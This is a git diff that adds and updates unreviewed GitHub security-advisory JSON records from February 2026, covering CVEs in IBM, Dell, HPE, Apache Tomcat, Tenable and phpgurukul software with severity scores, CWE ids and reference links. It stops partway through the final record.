b/advisories/unreviewed/2026/02/GHSA-5mcc-f9f9-29w9/GHSA-5mcc-f9f9-29w9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mcc-f9f9-29w9", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33124" + ], + "details": "IBM DB2 Merge Backup for Linux, UNIX and Windows 12.1.0.0 could allow an authenticated user to cause the program to crash due to the incorrect calculation of a buffer size.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33124" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260043" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-131" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5xwj-82gw-46fv/GHSA-5xwj-82gw-46fv.json b/advisories/unreviewed/2026/02/GHSA-5xwj-82gw-46fv/GHSA-5xwj-82gw-46fv.json new file mode 100644 index 0000000000000..ff1b73881af32 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5xwj-82gw-46fv/GHSA-5xwj-82gw-46fv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xwj-82gw-46fv", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27898" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 does not invalidate session after a timeout which could allow an authenticated user to impersonate another user on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27898" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-622x-ww28-86h7/GHSA-622x-ww28-86h7.json b/advisories/unreviewed/2026/02/GHSA-622x-ww28-86h7/GHSA-622x-ww28-86h7.json index 43fa143b9f25c..ebff11352d9e5 100644 --- a/advisories/unreviewed/2026/02/GHSA-622x-ww28-86h7/GHSA-622x-ww28-86h7.json +++ b/advisories/unreviewed/2026/02/GHSA-622x-ww28-86h7/GHSA-622x-ww28-86h7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-622x-ww28-86h7", - "modified": "2026-02-17T18:32:57Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-17T18:32:57Z", "aliases": [ "CVE-2024-55270" ], "details": "phpgurukul Student Management System 1.0 is vulnerable to SQL Injection in studentms/admin/search.php via the searchdata parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T18:20:27Z" diff --git a/advisories/unreviewed/2026/02/GHSA-65rw-7fc7-g478/GHSA-65rw-7fc7-g478.json b/advisories/unreviewed/2026/02/GHSA-65rw-7fc7-g478/GHSA-65rw-7fc7-g478.json new file mode 100644 index 0000000000000..c44b2b8ae5d96 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-65rw-7fc7-g478/GHSA-65rw-7fc7-g478.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65rw-7fc7-g478", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-13108" + ], + "details": "IBM DB2 Merge Backup for Linux, UNIX and Windows 12.1.0.0 could allow an attacker to access sensitive information in memory due to the buffer not properly clearing resources.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13108" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260043" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json index eb8792c82e4f2..3949df9e8c834 100644 --- a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json +++ b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6j8r-j98h-9g9f", - "modified": "2026-02-12T15:32:42Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-02T15:30:34Z", "aliases": [ "CVE-2026-1761" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2026-1761" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2844" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2628" diff --git a/advisories/unreviewed/2026/02/GHSA-6xm9-322m-9c67/GHSA-6xm9-322m-9c67.json b/advisories/unreviewed/2026/02/GHSA-6xm9-322m-9c67/GHSA-6xm9-322m-9c67.json index ff7d93c6b53c3..44d9ed14729bc 100644 --- a/advisories/unreviewed/2026/02/GHSA-6xm9-322m-9c67/GHSA-6xm9-322m-9c67.json +++ b/advisories/unreviewed/2026/02/GHSA-6xm9-322m-9c67/GHSA-6xm9-322m-9c67.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json new file mode 100644 index 0000000000000..6e844f0378d15 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74jq-6q38-p5wf", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-23595" + ], + "details": "An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to gain administrative access, modify system configurations, and access or manipulate sensitive data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23595" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05002en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7g55-6w4c-27v8/GHSA-7g55-6w4c-27v8.json b/advisories/unreviewed/2026/02/GHSA-7g55-6w4c-27v8/GHSA-7g55-6w4c-27v8.json new file mode 100644 index 0000000000000..eb0e912542f79 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7g55-6w4c-27v8/GHSA-7g55-6w4c-27v8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7g55-6w4c-27v8", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36597" + ], + "details": "Dell Avamar, versions prior to 19.12 with patch 338905, contains an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the Security. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36597" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000347698/dsa-2025-271-security-update-for-dell-avamar-and-dell-avamar-virtual-edition-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-846m-xcgv-cmm3/GHSA-846m-xcgv-cmm3.json b/advisories/unreviewed/2026/02/GHSA-846m-xcgv-cmm3/GHSA-846m-xcgv-cmm3.json new file mode 100644 index 0000000000000..d8f59b7106c95 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-846m-xcgv-cmm3/GHSA-846m-xcgv-cmm3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-846m-xcgv-cmm3", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2025-12755" + ], + "details": "IBM MQ Operator (SC2 v3.2.0–3.8.1, LTS v2.0.0–2.0.29) and IBM‑supplied MQ Advanced container images (across affected SC2, CD, and LTS 9.3.x–9.4.x releases) contain a vulnerability where log messages are not properly neutralized before being written to log files. This flaw could allow an unauthorized user to inject malicious data into MQ log entries, potentially leading to misleading logs, log manipulation, or downstream log‑processing issues.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12755" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260087" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-117" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json new file mode 100644 index 0000000000000..c94330561f16b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8rh3-rvv2-3mr4", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-23596" + ], + "details": "A vulnerability in the management API of the affected product could allow an unauthenticated remote attacker to trigger service restarts. Successful exploitation could allow an attacker to disrupt services and negatively impact system availability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23596" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05002en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-95x4-2j8q-mf8q/GHSA-95x4-2j8q-mf8q.json b/advisories/unreviewed/2026/02/GHSA-95x4-2j8q-mf8q/GHSA-95x4-2j8q-mf8q.json new file mode 100644 index 0000000000000..ab8f2703b2624 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-95x4-2j8q-mf8q/GHSA-95x4-2j8q-mf8q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-95x4-2j8q-mf8q", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36243" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36243" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pq4-hhwq-2hcq/GHSA-9pq4-hhwq-2hcq.json b/advisories/unreviewed/2026/02/GHSA-9pq4-hhwq-2hcq/GHSA-9pq4-hhwq-2hcq.json index 83638af4f8133..b2aaec36af967 100644 --- a/advisories/unreviewed/2026/02/GHSA-9pq4-hhwq-2hcq/GHSA-9pq4-hhwq-2hcq.json +++ b/advisories/unreviewed/2026/02/GHSA-9pq4-hhwq-2hcq/GHSA-9pq4-hhwq-2hcq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9pq4-hhwq-2hcq", - "modified": "2026-02-17T18:32:57Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-17T18:32:57Z", "aliases": [ "CVE-2024-55271" ], "details": "A Cross-Site Request Forgery (CSRF) vulnerability has been identified in phpgurukul Gym Management System 1.0. This issue is present in the profile update functionality of the User Panel, specifically the /profile.php endpoint.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-352" + ], + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T17:21:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9xgc-j99m-jvr5/GHSA-9xgc-j99m-jvr5.json b/advisories/unreviewed/2026/02/GHSA-9xgc-j99m-jvr5/GHSA-9xgc-j99m-jvr5.json index a71fd3def1615..324d6614b54db 100644 --- a/advisories/unreviewed/2026/02/GHSA-9xgc-j99m-jvr5/GHSA-9xgc-j99m-jvr5.json +++ b/advisories/unreviewed/2026/02/GHSA-9xgc-j99m-jvr5/GHSA-9xgc-j99m-jvr5.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-434" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json new file mode 100644 index 0000000000000..56e6e2ccb704d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c56r-fcf4-6rp2", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-22769" + ], + "details": "Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exploit this vulnerability leading to unauthorized access to the underlying operating system and root-level persistence. Dell recommends that customers upgrade or apply one of the remediations as soon as possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22769" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c62m-j9cx-48c8/GHSA-c62m-j9cx-48c8.json b/advisories/unreviewed/2026/02/GHSA-c62m-j9cx-48c8/GHSA-c62m-j9cx-48c8.json index 2ec4f8d705798..9faa0f483bce4 100644 --- a/advisories/unreviewed/2026/02/GHSA-c62m-j9cx-48c8/GHSA-c62m-j9cx-48c8.json +++ b/advisories/unreviewed/2026/02/GHSA-c62m-j9cx-48c8/GHSA-c62m-j9cx-48c8.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c62m-j9cx-48c8", - "modified": "2026-02-17T18:32:57Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-17T18:32:57Z", "aliases": [ "CVE-2026-23648" ], "details": "Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An attacker with local access can replace or modify these binaries to execute arbitrary commands with root privileges, enabling local privilege escalation.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-cc8m-46cg-cg54/GHSA-cc8m-46cg-cg54.json b/advisories/unreviewed/2026/02/GHSA-cc8m-46cg-cg54/GHSA-cc8m-46cg-cg54.json new file mode 100644 index 0000000000000..30091ec56a771 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cc8m-46cg-cg54/GHSA-cc8m-46cg-cg54.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cc8m-46cg-cg54", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-22762" + ], + "details": "Dell Avamar Server and Avamar Virtual Edition, versions prior to 19.10 SP1 with CHF338912, contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the Security. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to arbitrary file delete.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22762" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000425796/dsa-2026-053-security-update-for-dell-avamar-server-and-dell-avamar-virtual-edition-improper-limitation-of-a-pathname-to-a-restricted-directory-path-traversal-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cxcr-rj95-h6f4/GHSA-cxcr-rj95-h6f4.json b/advisories/unreviewed/2026/02/GHSA-cxcr-rj95-h6f4/GHSA-cxcr-rj95-h6f4.json new file mode 100644 index 0000000000000..9734949983c94 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cxcr-rj95-h6f4/GHSA-cxcr-rj95-h6f4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxcr-rj95-h6f4", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36376" + ], + "details": "IBM Security QRadar EDR 3.12 through 3.12.23 does not invalidate session after a session expiration which could allow an authenticated user to impersonate another user on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36376" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260390" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fp2x-rmwp-chww/GHSA-fp2x-rmwp-chww.json b/advisories/unreviewed/2026/02/GHSA-fp2x-rmwp-chww/GHSA-fp2x-rmwp-chww.json new file mode 100644 index 0000000000000..d0a5cec5cdb84 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fp2x-rmwp-chww/GHSA-fp2x-rmwp-chww.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fp2x-rmwp-chww", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36598" + ], + "details": "Dell Avamar, versions prior to 19.12 with patch 338905, contains an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the Security. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to upload malicious files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36598" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000347698/dsa-2025-271-security-update-for-dell-avamar-and-dell-avamar-virtual-edition-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fpj8-gq4v-p354/GHSA-fpj8-gq4v-p354.json b/advisories/unreviewed/2026/02/GHSA-fpj8-gq4v-p354/GHSA-fpj8-gq4v-p354.json new file mode 100644 index 0000000000000..3c84c6d8f796e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fpj8-gq4v-p354/GHSA-fpj8-gq4v-p354.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fpj8-gq4v-p354", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2025-66614" + ], + "details": "Improper Input Validation vulnerability.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0-M1 through 9.0.112.\n\nThe following versions were EOL at the time the CVE was created but are \nknown to be affected: 8.5.0 through 8.5.100. Older EOL versions are not affected.\nTomcat did not validate that the host name provided via the SNI \nextension was the same as the host name provided in the HTTP host header \nfield. If Tomcat was configured with more than one virtual host and the \nTLS configuration for one of those hosts did not require client \ncertificate authentication but another one did, it was possible for a \nclient to bypass the client certificate authentication by sending \ndifferent host names in the SNI extension and the HTTP host header field.\n\n\n\nThe vulnerability only applies if client certificate authentication is \nonly enforced at the Connector. It does not apply if client certificate \nauthentication is enforced at the web application.\n\n\nUsers are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fix the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66614" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/vw6lxtlh2qbqwpb61wd3sv1flm2nttw7" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-frcr-mg6p-g499/GHSA-frcr-mg6p-g499.json b/advisories/unreviewed/2026/02/GHSA-frcr-mg6p-g499/GHSA-frcr-mg6p-g499.json new file mode 100644 index 0000000000000..2c83c61b895e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-frcr-mg6p-g499/GHSA-frcr-mg6p-g499.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frcr-mg6p-g499", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2026-2630" + ], + "details": "A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2630" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2026-06" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fvpc-p8pv-qjmp/GHSA-fvpc-p8pv-qjmp.json b/advisories/unreviewed/2026/02/GHSA-fvpc-p8pv-qjmp/GHSA-fvpc-p8pv-qjmp.json new file mode 100644 index 0000000000000..130ae92b7b4f4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fvpc-p8pv-qjmp/GHSA-fvpc-p8pv-qjmp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvpc-p8pv-qjmp", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27903" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 IBM Db2 Recovery Expert for Linux, UNIX and Windows transmits data in a cleartext communication channel that could allow an attacker to obtain sensitive information using man in the middle techniques.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27903" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fwv6-g5vr-pgpx/GHSA-fwv6-g5vr-pgpx.json b/advisories/unreviewed/2026/02/GHSA-fwv6-g5vr-pgpx/GHSA-fwv6-g5vr-pgpx.json new file mode 100644 index 0000000000000..e88c9aa2cbd7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fwv6-g5vr-pgpx/GHSA-fwv6-g5vr-pgpx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwv6-g5vr-pgpx", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27904" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 IBM Db2 Recovery Expert for Linux, UNIX and Windows is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.", + "severity": [ + { + 